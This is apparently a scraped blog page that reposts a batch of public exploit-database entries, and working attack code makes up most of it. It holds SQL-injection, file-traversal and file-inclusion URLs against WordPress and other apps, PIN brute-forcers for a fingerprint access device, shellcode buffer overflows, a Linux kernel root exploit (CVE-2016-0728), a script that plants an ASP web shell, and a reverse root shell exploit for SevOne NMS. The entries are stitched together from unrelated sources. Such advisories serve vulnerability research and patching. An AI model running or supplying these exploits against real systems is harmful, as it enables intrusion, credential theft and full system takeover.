source: https://www.securityfocus.com/bid/69422/info
Spider Video Player extension for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
An attacker may leverage this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Spider Video Player Extension 2.8.3 is vulnerable; other versions may also be affected.
http://www.example.com/component/spidervideoplayer/?view=settings&format=row&typeselect=0&playlist=1,&theme=1'
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863152443
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
source: https://www.securityfocus.com/bid/69390/info
Grand MA 300 is prone to multiple security weaknesses.
Attackers can exploit these issues to disclose the access pin by sniffing network traffic or perform brute-force attacks on pin to gain unauthorized access. This may aid in other attacks.
Grand MA 300 running firmware version 6.60 is vulnerable.
#!/usr/bin/perl
#
# This brute-forces the pin of a Grand MA 300 Fingerprint
# Access device in less than 5 minutes, if the pin
# is between 1 and 4294967296.
#
# written by Eric Sesterhenn <eric.sesterhenn () lsexperts de>
# http://www.lsexperts.de
#
use IO::Socket::INET;
use strict;
use warnings;
sub hexd {
my ($data) = @_;
my $ret = "";
for (my $i=0; $i<length($data); $i++) {
$ret .= sprintf "%X", ord(substr($data, $i, 1));
}
return $ret;
}
sub getword {
my ($data, $offset) = @_;
my $ret = 0;
$ret = ord(substr($data, $offset, 1));
$ret += 0x100 * ord(substr($data, $offset+1, 1));
return $ret;
}
sub makeword {
my ($value) = @_;
my $ret = chr(($value & 0xFF)) . chr((($value >> 8) & 0xFF));
return $ret;
}
sub calccrc {
my ($packet) = @_;
# we pad with zero for packets of uneven length
my $newpacket = substr($packet, 0, 2) . substr($packet, 4) . chr(0);
my $crc = 0;
# the crc is the sum of all words in the packet
for (my $i = 0; $i<length($packet) - 2; $i += 2) {
$crc += getword($newpacket, $i);
}
# if the result is to big, we add the high bits to the lower bits
while ($crc > 0xFFFF) {
$crc = ($crc & 0xFFFF) + ($crc >> 0x10);
}
# negate the checksum
$crc = ~$crc & 0xFFFF;
return $crc;
}
sub makepacket {
my ($type, $cid, $seqno, $data) = @_;
my $crc = calccrc(makeword($type).makeword(0).makeword($cid).makeword($seqno).$data);
return makeword($type).makeword($crc).makeword($cid).makeword($seqno).$data;
}
sub calcpass {
my ($pin, $cid) = @_;
my $ret = 0;
# revert the bits
for (my $i = 0; $i < 32; $i++) {
$ret *= 2;
if ($pin & 1) {
$ret = $ret + 1;
}
$pin = $pin / 2;
}
$ret += $cid;
# xor with magic value
$ret ^= 0x4F534B5A;
# switch the words
$ret = (($ret & 0xFFFF) << 16) + ($ret >> 16);
# xor all, but third byte with last byte of gettickcount
my $gc = 0x00;
$ret ^= $gc + ($gc << 8) + ($gc << 24);
# set third byte to last byte of gettickcount
# this weakens the algorithm even further, since this byte
# is no longer relevant to the algorithm
$ret = ($ret & 0xFF000000) + ($gc << 16) + ($ret & 0xFFFF);
return $ret;
}
# flush after every write
local $| = 1;
my ($socket,$client_socket);
# creating object interface of IO::Socket::INET modules which internally creates
# socket, binds and connects to the TCP server running on the specific port.
my $data;
$socket = new IO::Socket::INET (
PeerHost => '192.168.1.201', # CHANGEME
PeerPort => '4370',
Proto => 'udp',
) or die "ERROR in Socket Creation : $!\n";
# initialize the connection
$socket->send(makepacket(1000, 0, 0, ""));
$socket->recv($data, 1024);
my $typ = getword($data, 0);
my $cid = getword($data, 4);
if ($typ != 2005) {
printf("Client does not need a password");
exit(-1);
}
for (my $i = 0; $i < 65536; $i++) {
if (($i % 10) == 0) { printf "$i\n"; }
my $pass = calcpass($i, $cid);
$socket->send(makepacket(1102, $cid, $i + 1, pack("V", $pass)));
$socket->recv($data, 1024);
$typ = getword($data, 0);
if ($typ == 2000) {
printf("Found pin: %d\n", $i);
exit(0);
}
}
# disconnect
$socket->send(makepacket(1001, $cid, 2, ""));
$socket->close();
source: https://www.securityfocus.com/bid/69390/info
Grand MA 300 is prone to multiple security weaknesses.
Attackers can exploit these issues to disclose the access pin by sniffing network traffic or perform brute-force attacks on pin to gain unauthorized access. This may aid in other attacks.
Grand MA 300 running firmware version 6.60 is vulnerable.
#!/usr/bin/perl
#
# This script calculates the original pin based on the pin
# retrieved on the wire for the Grand MA 300 fingerprint access device
#
# look for a UDP packet starting with 0x4E 0x04, the last 4 bytes are the
# encoded pin
#
# written by Eric Sesterhenn <eric.sesterhenn () lsexperts de>
# http://www.lsexperts.de
#
use warnings;
use strict;
my $cid = 0; # connection id
my $ret = 0x4B00A987; # pin on the wire
# get gettickcount value (third byte)
my $gc = ($ret >> 16) & 0xFF;
# set third byte to magic value (so it becomes zero when we xor it later with the magic value)
$ret = $ret | 0x005A0000;
# xor all, but third byte with last byte of gettickcount
$ret ^= $gc + ($gc << 8) + ($gc << 24);
# switch the words
$ret = (($ret & 0xFFFF) << 16) + ($ret >> 16);
# xor with magic value
$ret ^= 0x4F534B5A;
# substract the connection id
$ret -= $cid;
my $fin = 0;
# revert the bits
for (my $i = 0; $i < 32; $i++) {
$fin *= 2;
if ($ret & 1) {
$fin = $fin + 1;
}
$ret = $ret / 2;
}
printf("final: %X \n", $fin);
source: https://www.securityfocus.com/bid/69387/info
The KenBurner Slider plugin for WordPress is prone to an arbitrary file-download vulnerability.
An attacker can exploit this issue to download arbitrary files from the web server and obtain potentially sensitive information.
http://www.example.com/wp-admin/admin-ajax.php?action=kbslider_show_image&img=../wp-config.php
source: https://www.securityfocus.com/bid/69386/info
MyAwards module for MyBB is prone to a cross-site request-forgery vulnerability.
An attacker may exploit this issue to perform certain unauthorized actions. This may lead to further attacks.
Versions prior to MyAwards 2.4 are vulnerable.
https://www.example.com/forum/admin/index.php?module=user-awards&action=awards_delete_user&id=1&awid=1&awuid=2
https://www.example.com/forum/admin/index.php?module=user-awards&action=awards_delete_user&id=1&awuid=1
source: https://www.securityfocus.com/bid/69307/info
ArticleFR is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
ArticleFR 3.0.4 is vulnerable; prior versions may also be affected.
http://www.example.com/rate.php?act=get&id=0%20union%20select%201,(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHA R(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(1 11),CHAR(111),CHAR(98),CHAR(97),CHAR(114))))%20--%202
source: https://www.securityfocus.com/bid/69303/info
ManageEngine Password Manager Pro and ManageEngine IT360 are prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
The following products are affected:
ManageEngine Password Manager Pro 5 through 7 build 7003
ManageEngine IT360 8 through 10.1.1 build 10110
www.example.com/MetadataServlet.dat?sv=[SQLi]
www.example.com/console/MetadataServlet.dat?sv=[SQLi]
>> Blind SQL injection in ManageEngine Desktop Central, Password Manager Pro and IT360 (including MSP versions)
>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security
==========================================================================
Disclosure: 19/08/2014 / Last updated: 05/02/2015
>> Background on the affected products:
"Desktop Central is an integrated desktop & mobile device management software that helps in managing the servers, laptops, desktops, smartphones and tablets from a central point. It automates your regular desktop management routines like installing patches, distributing software, managing your IT Assets, managing software licenses, monitoring software usage statistics, managing USB device usage, taking control of remote desktops, and more."
"Password Manager Pro is a secure vault for storing and managing shared sensitive information such as passwords, documents and digital identities of enterprises."
"Managing mission critical business applications is now made easy through ManageEngine IT360. With agentless monitoring methodology, monitor your applications, servers and databases with ease. Agentless monitoring of your business applications enables you high ROI and low TOC. With integrated network monitoring and bandwidth utilization, quickly troubleshoot any performance related issue with your network and assign issues automatically with ITIL based ServiceDesk integration."
These products have managed service providers (MSP) versions which are used to control the desktops and smartphones of several clients.
Quoting the author of the Internet Census 2012: "As a rule of thumb, if you believe that "nobody would connect that to the Internet, really nobody", there are at least 1000 people who did."
These vulnerabilities can be abused to achieve remote code execution as SYSTEM in Windows or as the user in Linux. Needless to say, owning a Desktop Central / IT360 box will give you control of all the computers and smartphones it manages, while owning Password Manager Pro will give you a treasure trove of passwords.
>> Technical details:
The two blind SQL injections described below have been present in Desktop Central, Password Manager Pro and IT360 in all releases since 2006. They can only be triggered via a GET request, which means you can only inject around 8000 characters at a time.
#1
Vulnerability:
Blind SQL injection in LinkViewFetchServlet (unauthenticated on DC/PMP / authenticated on IT360)
CVE-2014-3996
Affected products / versions:
- ManageEngine Desktop Central (DC) [MSP]: all versions from v4 up to v9 build 90033
- ManageEngine Password Manager Pro (PMP) [MSP]: all versions from v5 to version 7 build 7002
- ManageEngine IT360 [MSP]: all versions from v8 to v10.1.1 build 10110
This affects all versions of the products released since 19-Apr-2006. Other ManageEngine products might be affected.
Fix: Upgrade to DC v9 build 90043; PMP v7 build 7003; IT360 v10.3.3 build 10330
Constraints:
- DC: no authentication or any other information needed
- PMP: no authentication or any other information needed
- IT360: valid user account needed
Proof of concept:
DC / PMP:
GET /LinkViewFetchServlet.dat?sv=[SQLi]
IT360:
GET /console/LinkViewFetchServlet.dat?sv=[SQLi]
#2
Vulnerability:
Blind SQL injection in MetadataServlet (unauthenticated on PMP / authenticated on IT360)
CVE-2014-3997
Affected products / versions:
- ManageEngine Password Manager Pro (PMP) [MSP]: all versions from v5 to version 7 build 7002
- ManageEngine IT360 [MSP]: all versions from v8 to v10.1.1 build 10110
This affects all versions of the products released since 03-Apr-2008. Other ManageEngine products might be affected.
Fix: Upgrade to DC v9 build 90043; PMP v7 build 7003; IT360 v10.3.3 build 10330
Constraints:
- PMP: no authentication or any other information needed
- IT360: valid user account needed
Proof of concept:
PMP:
GET /MetadataServlet.dat?sv=[SQLi]
IT360:
GET /console/MetadataServlet.dat?sv=[SQLi]
================
Agile Information Security Limited
http://www.agileinfosec.co.uk/
>> Enabling secure digital business >>
source: https://www.securityfocus.com/bid/69278/info
WP Content Source Control plugin for WordPress is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input.
Exploiting this issue can allow an attacker to obtain sensitive information that could aid in further attacks.
WP Content Source Control 3.0.0 is vulnerable; other versions may also be affected.
www.example.com/wp-content/plugins/wp-source-control/downloadfiles/download.php?path=../../../../wp-config.php
# Exploit Author: Juan Sacco - http://www.exploitpack.com <
jsacco@exploitpack.com>
# Program: xwpe - Windows Editor v1.5.30a-2.1
# Description: Programming environment and editor for console and X11
# Tested and developed on: Kali Linux 2.0 x86 - https://www.kali.org
#
# Description: xwpe v1.5.30a-2.1 and prior is prone to a stack-based buffer
# overflow vulnerability because the application fails to perform adequate
# boundary-checks on user-supplied input.
#
# An attacker could exploit this issue to execute arbitrary code in the
# context of the application. Failed exploit attempts will result in a
# denial-of-service condition.
#
# Vendor homepage: http://www.identicalsoftware.com/xwpe
# Kali Linux 2.0 package: pool/main/x/xwpe/xwpe_1.5.30a-2.1_i386.deb
# MD5: 793a89f7df892c7934be6c2353a6f0f9
#
#gdb$ run $(python -c 'print "\x90" * 290 + "DCBA"')
#Starting program: /usr/bin/xwe $(python -c 'print "\x90" * 290 + "DCBA"')
#sh: 1: /usr/sbin/gpm: not found
#
# ESI: 0x41414141 EDI: 0x41414141 EBP: 0x41414141 ESP: 0xBFFFF370 EIP:
0x42434441
# CS: 0073 DS: 007B ES: 007B FS: 0000 GS: 0033 SS: 007BError while
running hook_stop:
#Cannot access memory at address 0x42434441
#0x42434441 in ?? ()
#gdb$ backtrace
#0 0x42434441 in ?? ()
#1 0x4f4e2041 in ?? ()
#2 0x61732054 in ?? ()
#3 0x21646576 in ?? ()
#4 0x206f440a in ?? ()
#5 0x20756f79 in ?? ()
#6 0x746e6177 in ?? ()
#7 0x206f7420 in ?? ()
#8 0x65766173 in ?? ()
#9 0x6c694620 in ?? ()
#10 0x003f2065 in ?? ()
#11 0x00000088 in ?? ()
#12 0x00000132 in ?? ()
#13 0x00000006 in ?? ()
#14 0x00002710 in ?? ()
#15 0x0000009a in ?? ()
#16 0xfac9bc00 in ?? ()
#17 0x00000098 in ?? ()
#18 0x00000011 in ?? ()
#19 0xb7f783d9 in _nc_wgetch () from /lib/i386-linux-gnu/libncurses.so.5
#20 0xb7f79162 in wgetch () from /lib/i386-linux-gnu/libncurses.so.5
#21 0x0809927d in ?? ()
#22 0x0806b23c in ?? ()
#23 0x08055c78 in ?? ()
#24 0x080565b5 in ?? ()iles ESC-F3 Close W. F4 Search ^L S.Again ESC-X
Quit
#25 0x080574aa in ?? ()
#26 0x0804b8b8 in ?? ()
#27 0xb7ddca63 in __libc_start_main (main=0x804b570, argc=0x2,
argv=0xbffff664, init=0x809a060, fini=0x809a050, rtld_fini=0xb7fedc90
<_dl_fini>, stack_end=0xbffff65c) at libc-start.c:287
#28 0x08049ea1 in ?? ()
import os,subprocess
def run():
try:
print "# xwpe Buffer Overflow by Juan Sacco"
print "# It's AGAIN Fuzzing time on unusable exploits"
print "# This exploit is for educational purposes only"
# JUNK + SHELLCODE + NOPS + EIP
junk = "\x41"*262
shellcode = "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
nops = "\x90"*124
eip = "\x50\xd1\xff\xbf"
subprocess.call(["xwpe",' ', junk + shellcode + nops + eip])
except OSError as e:
if e.errno == os.errno.ENOENT:
print "Sorry, xwpe not found!"
else:
print "Error executing exploit"
raise
def howtousage():
print "Snap! Something went wrong"
sys.exit(-1)
if __name__ == '__main__':
try:
print "Exploit xWPE Local Overflow Exploit"
print "Author: Juan Sacco"
except IndexError:
howtousage()
run()
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/ORACLE-HTMLCONVERTER-BUFFER-OVERFLOW.txt
Vendor:
===============
www.oracle.com
Product:
========================================
Java Platform SE 6 U24 HtmlConverter.exe
Product Version: 6.0.240.50
The HTML Converter is part of Java SE binary part of the JDK and Allows web
page authors to explicitly target
the browsers and platforms used in their environment when modifying their
pages.
Vulnerability Type:
============================
Buffer Overflow
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
When calling htmlConverter.exe with specially crafted payload it will cause
buffer overflow executing arbitrary attacker supplied code.
This was a small vulnerability included as part of the overall Oracle CPU
released on January 19, 2016.
Reference:
http://www.oracle.com/technetwork/topics/security/cpujan2016-2367955.html
registers ...
EAX FFFFFFFE
ECX FFFFFFFE
EDX 0008E3C8
EBX 7EFDE000
ESP 0018FEB4
EBP 0018FF88
ESI 00001DB1
EDI 00000000
EIP 52525252 <-------- "RRRR" \x52
C 0 ES 002B 32bit 0(FFFFFFFF)
P 0 CS 0023 32bit 0(FFFFFFFF)
A 1 SS 002B 32bit 0(FFFFFFFF)
Z 0 DS 002B 32bit 0(FFFFFFFF)
S 0 FS 0053 32bit 7EFDD000(FFF)
T 0 GS 002B 32bit 0(FFFFFFFF)
D 0
Exploit code(s):
===============
###pgm="C:\\Oracle\\Middleware\\jdk160_24\\bin\\HtmlConverter.exe "
#EIP @ 2493
pgm="C:\\Program Files (x86)\\Java\jdk160_24\\bin\\HtmlConverter.exe "
#EIP 2469 - 2479
#shellcode to pop calc.exe Windows 7 SP1
sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
"\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
"\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
"\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
"\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
"\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65"
"\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")
#JMP ESP kernel32.dll
rp=struct.pack('<L', 0x76E72E2B)
payload="A"*2469+rp+"\x90"*10+sc
subprocess.Popen([pgm, payload], shell=False)
Disclosure Timeline:
=====================================
Vendor Notification: August 28, 2015
January 20, 2016 : Public Disclosure
Exploitation Technique:
=======================
Local
Severity Level:
===============
Medium
Description:
=============================================================
Vulnerable Product: [+] Java SE 6 U24 HtmlConverter.exe
=============================================================
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.
by hyp3rlinx
source: https://www.securityfocus.com/bid/69222/info
FB Gorilla plugin for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input.
An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/wp-content/plugins/fbgorilla/game_play.php?id=-7+/*!50000union*/+/*!50000select*/+1,2,%28/*!50000group_Concat%28user_login%29*/%29,4,5,6,7,8,9,0,1,2,3+from+wp_users--
source: https://www.securityfocus.com/bid/69181/info
The GB Gallery Slideshow plugin for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
GB Gallery Slideshow 1.5 is vulnerable; other versions may also be affected.
POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Accept-language: en-us,en;q=0.5
Accept-encoding: gzip,deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-agent: sqlmap/1.0-dev-5b2ded0 (http://sqlmap.org)
Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
Host: 10.0.0.67
Cookie: wordpress_75aacd302e2a4723897cb1d154c13f77=pippo%7C1407707530%7C5ae003a01e51c11e530c14f6149c9d07; wp-settings-time-1=1407537471; wp-settings-time-2=1406916594; wp-settings-1=editor%3Dtinymce%26libraryContent%3Dbrowse; voted_2=6; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_75aacd302e2a4723897cb1d154c13f77=pippo%7C1407707530%7C6988bc86de7b7790fca51ea294e171a1; redux_current_tab=3
Pragma: no-cache
Cache-control: no-cache,no-store
Content-type: application/x-www-form-urlencoded; charset=utf-8
Content-length: 120
Connection: close
action=gb_ajax_get_group&gb_nonce=5356513fbe&selected_group=[SQL_Injection]
Exploit via sqlmap:
sqlmap --cookie='INSERT_WORDPRESS_COOKIE_HERE' -u "http://www.example.com/wp-admin/admin-ajax.php" \
--data="action=gb_ajax_get_group&gb_nonce=5356513fbe&selected_group=2" -p selected_group --dbms=mysql
---
Place: POST
Parameter: selected_group
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: action=gb_ajax_get_group&gb_nonce=5356513fbe&selected_group=2 AND SLEEP(5)
Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
---
source: https://www.securityfocus.com/bid/69109/info
VoipSwitch is prone to a local file-include vulnerability because it fails to sufficiently sanitize user-supplied input.
An attacker can exploit this vulnerability to view files and execute local scripts in the context of the web server process. This may aid in further attacks.
https://www.example.com/user.php?action=../../../windows/win.ini%00.jpg
source: https://www.securityfocus.com/bid/69105/info
The WordPress HDW Player plugin (Video Player & Video Gallery) is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
HDW Player 2.4.2 is vulnerable; other versions may also be affected.
http://www.example.com/wp-admin/admin.php?page=videos&opt=edit&id=2 union select 1,2,user(),4,5,6,database(),8,@@version,10,11,12
source: https://www.securityfocus.com/bid/69089/info
The WordPress Spreadsheet plugin (wpSS) is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
wpSS 0.62 is vulnerable; other versions may also be affected.
http://www.example.com/wordpress/wp-content/plugins/wpSS/ss_handler.php?ss_id=-20%20UNION%20ALL%20SELECT%201,2,3,4#
source: https://www.securityfocus.com/bid/69028/info
Barracuda Web Application Firewall is prone to an authentication-bypass vulnerability.
An attacker can exploit this issue to bypass the authentication mechanism and gain access to the appliance. This may aid in further attacks.
Barracuda Web Application Firewall 7.8.1.013 is vulnerable; other versions may also be affected.
http://www.example.com/cgi-mod/index.cgi?auth_type=Local&et=99999999996locale=en_US&password=5a2fd48b65c5d80881eeb0f738bcc6dc&primary_tab=SECURITY%20POLICIES&secondary_tab=request_limits&user=guest
/*
# Exploit Title: Linux kernel REFCOUNT overflow/Use-After-Free in keyrings
# Date: 19/1/2016
# Exploit Author: Perception Point Team
# CVE : CVE-2016-0728
*/
/* $ gcc cve_2016_0728.c -o cve_2016_0728 -lkeyutils -Wall */
/* $ ./cve_2016_072 PP_KEY */
/* EDB-Note: More information ~ http://perception-point.io/2016/01/14/analysis-and-exploitation-of-a-linux-kernel-vulnerability-cve-2016-0728/ */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <keyutils.h>
#include <unistd.h>
#include <time.h>
#include <unistd.h>
#include <sys/ipc.h>
#include <sys/msg.h>
typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;
#define STRUCT_LEN (0xb8 - 0x30)
#define COMMIT_CREDS_ADDR (0xffffffff81094250)
#define PREPARE_KERNEL_CREDS_ADDR (0xffffffff81094550)
struct key_type {
char * name;
size_t datalen;
void * vet_description;
void * preparse;
void * free_preparse;
void * instantiate;
void * update;
void * match_preparse;
void * match_free;
void * revoke;
void * destroy;
};
void userspace_revoke(void * key) {
commit_creds(prepare_kernel_cred(0));
}
int main(int argc, const char *argv[]) {
const char *keyring_name;
size_t i = 0;
unsigned long int l = 0x100000000/2;
key_serial_t serial = -1;
pid_t pid = -1;
struct key_type * my_key_type = NULL;
struct { long mtype;
char mtext[STRUCT_LEN];
} msg = {0x4141414141414141, {0}};
int msqid;
if (argc != 2) {
puts("usage: ./keys <key_name>");
return 1;
}
printf("uid=%d, euid=%d\n", getuid(), geteuid());
commit_creds = (_commit_creds) COMMIT_CREDS_ADDR;
prepare_kernel_cred = (_prepare_kernel_cred) PREPARE_KERNEL_CREDS_ADDR;
my_key_type = malloc(sizeof(*my_key_type));
my_key_type->revoke = (void*)userspace_revoke;
memset(msg.mtext, 'A', sizeof(msg.mtext));
// key->uid
*(int*)(&msg.mtext[56]) = 0x3e8; /* geteuid() */
//key->perm
*(int*)(&msg.mtext[64]) = 0x3f3f3f3f;
//key->type
*(unsigned long *)(&msg.mtext[80]) = (unsigned long)my_key_type;
if ((msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) == -1) {
perror("msgget");
exit(1);
}
keyring_name = argv[1];
/* Set the new session keyring before we start */
serial = keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name);
if (serial < 0) {
perror("keyctl");
return -1;
}
if (keyctl(KEYCTL_SETPERM, serial, KEY_POS_ALL | KEY_USR_ALL | KEY_GRP_ALL | KEY_OTH_ALL) < 0) {
perror("keyctl");
return -1;
}
puts("Increfing...");
for (i = 1; i < 0xfffffffd; i++) {
if (i == (0xffffffff - l)) {
l = l/2;
sleep(5);
}
if (keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name) < 0) {
perror("keyctl");
return -1;
}
}
sleep(5);
/* here we are going to leak the last references to overflow */
for (i=0; i<5; ++i) {
if (keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name) < 0) {
perror("keyctl");
return -1;
}
}
puts("finished increfing");
puts("forking...");
/* allocate msg struct in the kernel rewriting the freed keyring object */
for (i=0; i<64; i++) {
pid = fork();
if (pid == -1) {
perror("fork");
return -1;
}
if (pid == 0) {
sleep(2);
if ((msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) == -1) {
perror("msgget");
exit(1);
}
for (i = 0; i < 64; i++) {
if (msgsnd(msqid, &msg, sizeof(msg.mtext), 0) == -1) {
perror("msgsnd");
exit(1);
}
}
sleep(-1);
exit(1);
}
}
puts("finished forking");
sleep(5);
/* call userspace_revoke from kernel */
puts("caling revoke...");
if (keyctl(KEYCTL_REVOKE, KEY_SPEC_SESSION_KEYRING) == -1) {
perror("keyctl_revoke");
}
printf("uid=%d, euid=%d\n", getuid(), geteuid());
execl("/bin/sh", "/bin/sh", NULL);
return 0;
}
#
# Exploit Title: WhatsUp Gold v16.3 Unauthenticated Remote Code Execution
# Date: 2016-01-13
# Exploit Author: Matt Buzanowski
# Vendor Homepage: http://www.ipswitch.com/
# Version: 16.3.x
# Tested on: Windows 7 x86
# CVE : CVE-2015-8261
# Usage: python DroneDeleteOldMeasurements.py <target ip>
import requests
import sys
ip_addr = sys.argv[1]
shell = '''<![CDATA[<% response.write CreateObject("WScript.Shell").Exec(Request.QueryString("cmd")).StdOut.Readall() %>]]>'''
sqli_str = '''stuff'; END TRANSACTION; ATTACH DATABASE 'C:\\Program Files (x86)\\Ipswitch\\WhatsUp\\HTML\\NmConsole\\shell.asp' AS lol; CREATE TABLE lol.pwn (dataz text); INSERT INTO lol.pwn (dataz) VALUES ('%s');--''' % shell
session = requests.Session()
headers = {"SOAPAction":"\"http://iDrone.alertfox.com/DroneDeleteOldMeasurements\"","User-Agent":"Mozilla/4.0 (compatible; MSIE 6.0; MS Web Services Client Protocol 2.0.50727.4927)","Expect":"100-continue","Content-Type":"text/xml; charset=utf-8","Connection":"Keep-Alive"}
body = """<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<soap:Body>
<DroneDeleteOldMeasurements xmlns="http://iDrone.alertfox.com/">
<serializedDeleteOldMeasurementsRequest><?xml version="1.0" encoding="utf-16"?>
<DeleteOldMeasurementsRequest xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<authorizationString>0123456789</authorizationString>
<maxAgeInMinutes>1</maxAgeInMinutes>
<iDroneName>%s</iDroneName>
</DeleteOldMeasurementsRequest></serializedDeleteOldMeasurementsRequest>
</DroneDeleteOldMeasurements>
</soap:Body>
</soap:Envelope>""" % sqli_str
response = session.post("http://%s/iDrone/iDroneComAPI.asmx" % ip_addr,data=body,headers=headers)
print "Status code:", response.status_code
print "Response body:", response.content
print "\n\nSUCCESS!!! Browse to http://%s/NmConsole/shell.asp?cmd=whoami for unauthenticated RCE.\n\n" % ip_addr
#!/usr/bin/env python
# Exploit Title: SevOne NMS <= 5.3.6.0 reverse shell remote root
# Date: 01/14/2016
# Exploit Author: @iamsecurity
# Vendor Homepage: https://www.sevone.com/
# Software Link: https://www.sevone.com/download2/free/vimage/SevOne-Download.ova
# Version: 5.3.6.0
"""sevone.py: Simple reverse root shell exploit for SevOne <= 5.3.6.0.
Details: http://russiansecurity.expert/2016/01/14/critical-security-issues-in-sevone-nms/
run: ./sevone.py "sevone_url" lhost lport
"""
import sys
import requests
__author__ = '@iamsecurity'
def main():
if len(sys.argv) < 4:
print('Enter url of SevOne PAS server and listen IP and PORT to connect back.\nUsage: ' + sys.argv[0] +
' "sevone_url" lhost lport\nExample: ./sevone.py http://192.168.1.104 192.168.1.105 31337')
sys.exit(1)
requests.packages.urllib3.disable_warnings()
url = sys.argv[1]
lhost = sys.argv[2]
lport = sys.argv[3]
login_url = url + "/doms/login/processLogin.php"
rce_url = url + "/doms/discoveryqueue/kill.php"
login = "SevOneStats"
password = "n3v3rd13"
s = requests.Session()
s.verify = False
payload = [
'`echo \'import os; import pty; import socket; lhost="'+lhost+'"; lport='+lport+'; s=socket.socket(socket.AF_IN'
'ET, socket.SOCK_STREAM); s.connect((lhost, lport)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fi'
'leno(),2); os.putenv("HISTFILE","/dev/null"); pty.spawn("/bin/bash"); s.close()\' | dd of=/tmp/sess_ap6k1d1ucb'
'etfk9fhcqdnk0be5`',
'`python /tmp/sess_ap6k1d1ucbetfk9fhcqdnk0be5; rm -rf /tmp/sess_ap6k1d1ucbetfk9fhcqdnk0be5`'
]
s.post(login_url, {'login': login, 'passwd': password, 'tzString': 1})
s.post(rce_url, {'pids[]': payload[0]})
try:
s.post(rce_url, {'pids[]': payload[1]}, timeout=0.001)
except requests.exceptions.ReadTimeout:
print("Don't need wait for response from server. Exploit successfully!")
pass
if __name__ == "__main__":
main()
Source: https://code.google.com/p/google-security-research/issues/detail?id=555
